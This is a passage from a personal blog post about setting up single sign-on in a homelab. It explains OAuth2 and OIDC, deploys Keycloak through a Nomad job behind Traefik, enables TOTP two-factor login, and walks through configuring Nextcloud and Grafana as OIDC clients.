with OAuth: Using the <a href="https://www.drone.io/">Drone CI server</a> together with
<a href="https://gitea.io/en-us/">Gitea</a>. I don&rsquo;t want to go into details about the
setup, but: Drone CI itself does not have user management. It has completely
outsourced that to Gitea. When using Drone CI, you never create a Drone CI
account.</p>
<p>Instead, you have to enable OAuth support in your Gitea instance. Gitea will
serve as both, the resource server and the authorization server in the OAuth
flows, while Drone CI will be the client.
To enable Drone CI to talk to Gitea&rsquo;s API and access it&rsquo;s resources, namely the
Git repositories stored on the instance, you first have to create client
credentials. These credentials are user specific and consist of a client ID and
a Client secret.
Whenever you login to Drone, you are redirected to Gitea to authenticate, and
then redirected back to Drone CI. Drone CI then uses the token it received from
Gitea to show your repositories.</p>
<p>But OAuth2 only provides for <em>authorization</em> - meaning it allows a client access
to resources, but it doesn&rsquo;t have anything to do with <em>authentication</em> - which
is the process of demonstrating that a user is who they claim to be. That Gitea,
in the example above, required a login is only a specialty of Gitea before it
hands out a secure token.</p>
<p>So for authentication, the <em>OpenID Connect</em> (OIDC) protocol has been developed.
Under the hood, it makes use of OAuth2, but it allows for authentication. It
does so through an &ldquo;OIDC Identity Provider&rdquo;. This Identity Provider (IdP) is who
authenticates you.</p>
<p>So when you log into an app with OIDC, that app forwards you to the IdP, which
will then make sure that you are really who you claim to be, e.g. with a
username/password. Then, the IdP creates a JWT (JSON Web Token) and sends your
browser back to the client with that JWT. Encoded in that JWT can be several
pieces of information, like your username and email. The client then checks the
signature on that JWT, and if it fits the IdP&rsquo;s signature, it will trust the
information in that JWT and log you in.</p>
<p>As a side node, there is at least one more protocol I know about which can be
used for SSO: SAML. But OIDC is better supported at this point, so it is what
I chose.</p>
<h2 id="the-identity-provider">The identity provider</h2>
<p>The heart of an SSO setup is the Identity Provider, the service which allows
you to prove that you are you.</p>
<p>There are a number of implementations of the IdP spec. Most interesting are
probably the Open Source variants, like <a href="https://goauthentik.io/">Authentik</a>,
<a href="https://www.keycloak.org/">Keycloak</a> or <a href="https://www.vaultproject.io/">HashiCorp Vault</a>.
But there are also a large number of SaaS offerings. They get hacked from time
to time.</p>
<p>For myself, the decision was mostly between Authentik and Keycloak. I also
considered Vault for a while, as I&rsquo;ve already got a Vault cluster up and running
anyway. But I didn&rsquo;t feel comfortable with having my main secrets store
accessible on the public internet. See below for more details on Vault as an
OIDC provider.</p>
<p>So then there&rsquo;s only Authentik vs Keycloak left. And here I finally went with
the good old &ldquo;Argument from authority&rdquo;. Keycloak is developed and used/sold by
Red Hat. I&rsquo;ve got a relatively high level of trust in Red Hat. Not so for
Authentik. Don&rsquo;t get me wrong, they are most likely fine - but nobody ever got
fired for buying/deploying IBM, right? &#x1f609;</p>
<h3 id="deploying-keycloak">Deploying Keycloak</h3>
<p>I deployed Keycloak as a Nomad job in my cluster, and put it behind my
Traefik proxy.</p>
<p>The job file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;keycloak&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mydatacenter&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">70</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;keycloak&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">proxy</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-internal.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-internal.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-external.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myexternalentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-external.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>) <span style="color:#960050;background-color:#1e0010">&amp;&amp;</span> <span style="color:#66d9ef">PathPrefix</span>(<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">js</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">realms</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">myrealm</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">resources</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">robots</span>.<span style="color:#66d9ef">txt</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/health/ready&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;keycloak&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;quay.io/keycloak/keycloak:21.0.2&#34;</span>
</span></span><span style="display:flex;"><span>        command <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;start&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;keycloak&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">env</span> {
</span></span><span style="display:flex;"><span>        KC_DB <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>        KC_DB_URL_DATABASE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;keycloak&#34;</span>
</span></span><span style="display:flex;"><span>        KC_HOSTNAME <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;login.example.com&#34;</span>
</span></span><span style="display:flex;"><span>        KC_HOSTNAME_STRICT_BACKCHANNEL <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>        KC_PROXY <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;edge&#34;</span>
</span></span><span style="display:flex;"><span>        KC_HEALTH_ENABLED <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>        KC_LOG_CONSOLE_OUTPUT <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;json&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&lt;&lt;</span><span style="color:#66d9ef">EOH</span>
</span></span><span style="display:flex;"><span>KEYCLOAK_ADMIN<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;{{with secret &#34;foobar/admin&#34;}}{{.Data.user}}{{end}}&#34;</span>
</span></span><span style="display:flex;"><span>KEYCLOAK_ADMIN_PASSWORD<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">with</span> <span style="color:#66d9ef">secret</span> <span style="color:#e6db74">&#34;foobar/admin&#34;</span>}}{{.<span style="color:#66d9ef">Data</span>.<span style="color:#66d9ef">secret</span> <span style="color:#960050;background-color:#1e0010">|</span> <span style="color:#66d9ef">toJSON</span>}}{{<span style="color:#66d9ef">end</span>}}
</span></span><span style="display:flex;"><span>KC_DB_USERNAME<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;{{with secret &#34;foobar/db&#34;}}{{.Data.user}}{{end}}&#34;</span>
</span></span><span style="display:flex;"><span>KC_DB_PASSWORD<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">with</span> <span style="color:#66d9ef">secret</span> <span style="color:#e6db74">&#34;foobar/db&#34;</span>}}{{.<span style="color:#66d9ef">Data</span>.<span style="color:#66d9ef">pw</span> <span style="color:#960050;background-color:#1e0010">|</span> <span style="color:#66d9ef">toJSON</span>}}{{<span style="color:#66d9ef">end</span>}}
</span></span><span style="display:flex;"><span>KC_DB_URL_HOST<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">env</span> <span style="color:#e6db74">&#34;NOMAD_UPSTREAM_IP_postgres&#34;</span>}}
</span></span><span style="display:flex;"><span>KC_DB_URL_PORT<span style="color:#f92672">=</span>{{<span style="color:#66d9ef">env</span> <span style="color:#e6db74">&#34;NOMAD_UPSTREAM_PORT_postgres&#34;</span>}}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">EOH</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        env <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/file.env&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">800</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I&rsquo;ve obfuscated it a little bit. At this point, perhaps a small hint to those
who are currently typing &ldquo;security through obscurity doesn&rsquo;t work!!!&rdquo; into their
keyboards - you&rsquo;re entirely right. It doesn&rsquo;t. If it&rsquo;s your only layer of
security. You know what does work? Multi-layered security.</p>
<p>But onward with the job file: The constraint at the beginning isn&rsquo;t too
interesting - it just tells Nomad to schedule the job on an internal Node,
instead of a DMZ node.</p>
<p>The networking is configured in <code>bridge</code> mode, as I&rsquo;m using Consul Connect for
this job. If you want to read a bit more about Consul Connect and what it does,
you can have a look at <a href="https://blog.mei-home.net/posts/consul-mesh-problem/">this article</a>
I wrote recently about a Consul bug I encountered. It contains a section about
what Consul Connect does.</p>
<p>The service definition has Nomad register a service called <code>keycloak</code> in the
Consul service registry. It also defines my Postgres service, which also runs
as a Nomad job, as an upstream, as Keycloak requires a database to work.</p>
<p>The tags for the service are used to configure the Traefik router for Keycloak:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>  &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-internal.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-internal.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-external.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myexternalentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>  &#34;traefik.http.routers.keycloak-external.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>) <span style="color:#960050;background-color:#1e0010">&amp;&amp;</span> <span style="color:#66d9ef">PathPrefix</span>(<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">js</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">realms</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">myrealm</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">resources</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">robots</span>.<span style="color:#66d9ef">txt</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>While the first router, <code>keycloak-internal</code>, is pretty mundane, the external
route is more interesting. For additional security, I&rsquo;m restricting some paths.
Notably, only the <code>myrealm</code> realm is accessible externally. This excludes access
to the default <code>admin</code> realm. I&rsquo;ve also thought about introducing
an extra realm, just for external access, but finally decided against it.</p>
<p>The health check is not too special, besides the fact that it needs to be enabled
manually by setting the environment variable <code>KC_HEALTH_ENABLED</code> to <code>true</code>.</p>
<p>Then let&rsquo;s look at the really weird part of Keycloak&rsquo;s setup. As you can see,
I&rsquo;m not using the default Keycloak Docker container&rsquo;s command, but instead
specify <code>start</code> as the command to be run in the container.
The <a href="https://www.keycloak.org/server/containers">Keycloak docs</a> recommend
building a special Docker image, with all the environment variables already
specified in the image, and then running the container&rsquo;s <code>build</code> command.</p>
<p>This is a weird way of running an app in a container, right? But it also works
perfectly fine this way, with the environment variables specified during
container startup and executing the <code>start</code> command.</p>
<p>Of note in the env vars is the <code>KC_PROXY</code> variable. It tells Keycloak a bit
about the HTTP entry path, so whether it is running behind a proxy or not. This
is important because Keycloak has to generate a number of URLs during normal
operation, and it needs to know how external apps can reach it.
My config of <code>KC_PROXY=edge</code> tells Keycloak that it is running behind a proxy
and that the proxy will be terminating HTTPS and communicate with Keycloak via
HTTP. The communication between Traefik and Keycloak is secured by the Consul
Connect mesh connecting the two services.</p>
<p>What disappointed me a bit was the resource requirement. I was only able to
run it stably with 800 MB of memory assigned. Which seems a lot for a service
which, most of the day, doesn&rsquo;t do very much. Okay, it&rsquo;s a Java application,
but still, the consumption seems pretty high. Perhaps I will go the nostalgia
route someday and dig out my notes from when I did a deep dive into
Java&rsquo;s Garbage Collector while writing my Bachelor&rsquo;s thesis. &#x1f642;</p>
<h3 id="setup">Setup</h3>
<p>Once you log in with the admin account for the first time, only one realm will
exist, the <em>master</em> realm. This realm should not be used for any actual users,
and stay restricted to your admin account. The first step is now to create a fresh
realm.</p>
<figure>
    <img loading="lazy" src="new-realm-button.png"
         alt="A screenshot of the Keycloak realm page for the Master realm. It shows the realm choice drop-down, with the Master realm shown as the only choice, and the Create Realm button at the bottom."/> <figcaption>
            <p>The realm chooser with the Create Realm button</p>
        </figcaption>
</figure>

<p>The new realm page doesn&rsquo;t have many options, mainly the <em>Realm name</em> field is
of importance here. I have not used it myself, but the <em>Resource file</em> box can
be used to import a realm previously exported.</p>
<figure>
    <img loading="lazy" src="new-realm-page.png"
         alt="A screenshot of the Keycloak realm creation page. It is headed with &#39;Create Realm&#39;. There are two form fields, one labeled &#39;Resource file&#39; and one labeled &#39;Realm name&#39;. There&#39;s also a toggle labeled &#39;Enabled&#39; at the bottom."/> <figcaption>
            <p>The realm creation page</p>
        </figcaption>
</figure>

<p>Once you created a realm, make sure you chose it in the drop down at the top
left, and make sure to always have the right realm selected when creating users
or clients.</p>
<p>Keycloak&rsquo;s realms are the main container for users, groups and clients. They
all get their URL under Keycloak&rsquo;s <code>realms</code> URL. When we create a <code>blog</code> realm,
it will have all of its endpoints under <code>https://login.example.com/realms/blog</code>.
This is important to remember, as most applications only allow the configuration
of one OIDC provider URL, so any specific service can only ever use a single
realm.</p>
<p>Once the creation is done, the next step is looking at the <em>Realm settings</em>.</p>
<figure>
    <img loading="lazy" src="realm-settings.png"
         alt="A screenshot of the Keycloak realm settings page."/> <figcaption>
            <p>The realm settings page</p>
        </figcaption>
</figure>

<p>Note the <em>Endpoints</em> links at the bottom. When you click them, you will be
redirected to the <code>.well-known/openid-configuration</code> URL for the realm.
This shows you all the configuration of the OIDC endpoint this realm provides.
A lot of the apps I configured for OIDC use later were able to directly use
this <code>well-known</code> config, instead of needing all of those options entered
manually.</p>
<figure>
    <img loading="lazy" src="realm-login-settings.png"
         alt="A screenshot of the Keycloak realm login settings page. See the following text for relevant options."/> <figcaption>
            <p>The realm settings page</p>
        </figcaption>
</figure>

<p>For me, the most important options to set here is to switch off the
&lsquo;User registration&rsquo; and the &lsquo;Edit username&rsquo; feature. I&rsquo;m disabling the latter so
that I can use the <code>preferred_username</code> JWT token claim later to set the username
in apps when configuring them.</p>
<p>Another configuration is for sending mails, which can be configured on the <code>Email</code>
tab.</p>
<p>Finally, the <em>Sessions</em> tab allows configuration of idle timeouts
and other TTL settings for sessions.</p>
<figure>
    <img loading="lazy" src="realm-auth.png"
         alt="A screenshot of the Keycloak realm authentication settings page. See the following text for relevant options."/> <figcaption>
            <p>The realm authentication settings page</p>
        </figcaption>
</figure>

<p>The realm authentication settings are the last config for realms. In the <em>Required actions</em>
tab, you can define actions required for any new user before they can use
Keycloak. For example, setting the <em>Update Password</em> toggle to &ldquo;On&rdquo; will allow
admins to force a specific newly created user to have to change their password
after first login. Also enabling <em>Set as default action</em> will automatically
enable that requirement for all new users by default.</p>
<p>In my Homelab realm, I force all users to setup OTP and to update their
password.</p>
<h3 id="2fa-configuration">2FA configuration</h3>
<p>One of the major reasons for this entire endeavour was my wish to have 2FA,
at least for public services. And when using Keycloak for user authentication,
that&rsquo;s pretty easy to setup.</p>
<p>In my quest of not relying too much on a single company, I&rsquo;m using <a href="https://freeotp.github.io/">FreeOTP</a>.
It&rsquo;s also a Red Hat product - but hey, it&rsquo;s open source and not by Google. &#x1f609;</p>
<p>For 2FA, Keycloak supports TOTP, Time-Based One-Time Password. It&rsquo;s an <a href="https://www.ietf.org/rfc/rfc6238.txt">open standard</a>
The way it works is that the server (Keycloak in our case) and the client app
exchange a seed. This seed is then used for a RNG based on the current time.
It will display a sequence of numbers, which is then typed into the authentication
filed during Keycloak login.</p>
<figure>
    <img loading="lazy" src="new-user.png"
         alt="A screenshot of the Keycloak new user page. In the required actions form field, the &#39;Configure OTP&#39; action is given."/> <figcaption>
            <p>The realm user creation page</p>
        </figcaption>
</figure>

<p>When creating a new user, the user can be forced to configure OTP via the
<code>Required user actions</code> field. In this case, that is not strictly necessary, as
I had already configured OTP setup to be a default required user action.</p>
<figure>
    <img loading="lazy" src="mobile-auth-setup.png"
         alt="A screenshot of the Keycloak mobile auth page. It instructs the user to scan the displayed QR code and then to enter the one-time code provided by the application and click the submit button at the bottom."/> <figcaption>
            <p>The authenticator setup page of keycloak.</p>
        </figcaption>
</figure>

<p>Scanning the provided barcode works without problem, and now, whenever I log in,
Keycloak will also request a TOTP code.</p>
<h2 id="apps">Apps</h2>
<p>After the OIDC provider is now setup, we can set up the applications.</p>
<p>This is done in two phases. First, we need to create a client in the Keycloak
realm we would like the application to use. This is done in the realm&rsquo;s <em>client</em>
menu. First, we need to decide on a type, between the two that Keycloak supports:</p>
<ul>
<li>OIDC (what we will use)</li>
<li>SAML (an older protocol)</li>
</ul>
<p>Then we need to provide a client ID and a name. The client ID will be important
later as part of the client side config, but the name is only metadata and can
be chosen freely.</p>
<p>On the next page, <em>Capability config</em>, it is important to enable <em>Client authentication</em>
and make sure <em>Standard flow</em> is on.</p>
<p>The final client config page configures the domain and URLs of the client.
These are the URLs that Keycloak will accept for this particular client. They
have the following meaning:</p>
<ul>
<li><strong>Root URL:</strong> The root URL for the app, for example <code>https://app.example.com</code></li>
<li><strong>Home URL:</strong> This URL is used wherever Keycloak needs to link to the client.
Normally also just the root URL, e.g. <code>https://app.example.com</code></li>
<li><strong>Valid redirect URIs:</strong> This is a security measure. Here you can define to
which URL a client&rsquo;s auth request is allowed to link
back to. Each client auth request for a user will
contain a redirect link. With this option, Keycloak
will determine whether the provided URL is legitimate.
Otherwise, it will not allow authentication. This is
to prevent a site to redirect the auth request, which
will have the access token attached, to a malicious
site. An example would be <code>https://app.exmaple.com/*</code>
to allow any redirect to the root URL of the client.</li>
<li><strong>Valid post logout redirect URIs</strong> These work in the same way as the valid
redirect URIs, but for the post-logout redirect</li>
</ul>
<p>Once all of that&rsquo;s done, we can configure the application itself to work with
Keycloak. How that&rsquo;s done depends on the app. But for any app, we need to note
down the client ID we configured in the beginning, as well as the realm URL
and the client secret which Keycloak automatically generates for each client.
This secret can be found in the client&rsquo;s realm config page, on the <em>Credentials</em>
tab.</p>
<p>Another useful piece of information is the <code>.well-known</code> URL for the realm.
It can be found under the menu point <em>Realm settings</em> at the very bottom, behind
the <code>OpenID Endpoint Configuration</code> option. It generally has the format
<code>https://login.example.com/realms/&lt;REALM_NAME&gt;/.well-known/openid-configuration</code>.
Some apps allow you to set this URL, and the app will use the JSON document
hosted there to get all of the URLs it needs. Other apps don&rsquo;t have this
functionality and need you to go to that JSON document yourself and copy the
values from there into the app config.</p>
<p>Now without further ado, let&rsquo;s get into the application configs.</p>
<h3 id="nextcloud">Nextcloud</h3>
<p>Let&rsquo;s start with the worst experience I had during all of this. <a href="https://nextcloud.com/">Nextcloud</a>.
Nextcloud does support SSO with OpenID, but via an &ldquo;App&rdquo;, not natively. But at
least <a href="https://github.com/nextcloud/user_oidc">the app</a> is coming directly from
Nextcloud.</p>
<p>There were a couple of problems when introducing OIDC into an existing setup.
<strong>Make sure to read this entire section before proceeding!</strong></p>
<p>I used <a href="https://www.schiessle.org/articles/2020/07/26/nextcloud-and-openid-connect/">this article</a>
as a reference for my setup.</p>
<p>The first step is to create the Nextcloud OIDC client, as described above.
Then, in Nextcloud, install the <a href="https://apps.nextcloud.com/apps/user_oidc">OpenID Connect user backend</a>
app in your Nextcloud. Then, go to the app&rsquo;s configuration page in Nextcloud&rsquo;s
admin settings.</p>
<figure>
    <img loading="lazy" src="nc-oidc-config.png"
         alt="A screenshot of the Nextcloud OIDC app config. For the field &#39;Discovery endpoint&#39;, the URL &#39;https://login.example.com/realms/blog/.well-known/openid-configuration&#39; has been entered. The scope filed has been filled with &#39;openid email profile&#39; and the &#39;User ID mapping&#39; field is set to &#39;preferred_username&#39;. The checkbox &#39;User unique user ID&#39; is unchecked."/> <figcaption>
            <p>The Nextcloud oidc_user config page.</p>
        </figcaption>
</figure>

<p>The correct link for the &ldquo;Discovery endpoint&rdquo; can be found on the Keycloak
realm&rsquo;s &ldquo;Realm settings&rdquo; page, at the very bottom. The client ID is set during
creation of the client in Keycloak, and the &ldquo;Client secret&rdquo; can be found on the
&ldquo;Credentials&rdquo; tab of the client config in Keycloak.</p>
<p>The <em>Scope</em> setting describes the kind of information that Nextcloud will
request from Keycloak as part of the JWT token. &ldquo;openid&rdquo; is always required
when using OIDC for auth.</p>
<p>Of importance here is the &ldquo;User ID mapping&rdquo;. By default, this mapping is set
to &ldquo;sub&rdquo;. Sub is, at least in the case of Keycloak, a UUID for a user. So it&rsquo;s
going to be a string of numbers and letters. None too useful in my opinion.
But Keycloak provides another option - the &ldquo;preferred_username&rdquo;. This is the
username provided when a user is created in Keycloak. To make sure that no
impersonation can happen, the option to change usernames can be disabled in
Keycloak.
Finally, make sure not to check &ldquo;Use unique user id&rdquo;. This would create a
username by creating a hash over the &ldquo;Identifier&rdquo; and &ldquo;sub&rdquo; as delivered by
Keycloak.</p>
<p>The above config works in my Nextcloud instance. But what did not work for me:
Adopting an existing user did not seem to work. I was getting error messages
when trying to log in via Keycloak that it could not create the user - which
makes sense, as the user already existed.</p>
<p>So did I do the sensible thing an skip Nextcloud for SSO? No, of course not.
Instead, I spend a weekend nuking my Nextcloud instance and setting it up new
again.</p>
<p>Setting up Nextcloud is not the topic here, but still allow me to say: It
went surprisingly fast. I just synced all the content on a disk, exported
contacts and calendar, and then I nuked everything. While at it, I also switched
from local storage to S3 as Nextcloud&rsquo;s primary storage.</p>
<p>After recreating the instance and creating the new user by logging in with
Keycloak for the first time, everything worked as expected.</p>
<h3 id="grafana">Grafana</h3>
<p>Grafana&rsquo;s setup was way simpler than Nextcloud&rsquo;s - I was able to just adopt my
already existing user. This seems to have been done by checking the email and
username of existing users when logging in with Keycloak.</p>
<p>I worked off of <a href="https://grafana.com/docs/grafana/latest/setup-grafana/configure-security/configure-authentication/keycloak/">this official Grafana Guide</a></p>
<p>The most important thing to note here is that the description of the Keycloak
config is a bit outdated.</p>
<p>The &ldquo;Base URL&rdquo; is now the &ldquo;Home URL&rdquo;. Under the &ldquo;Client scopes&rdquo; tab of the
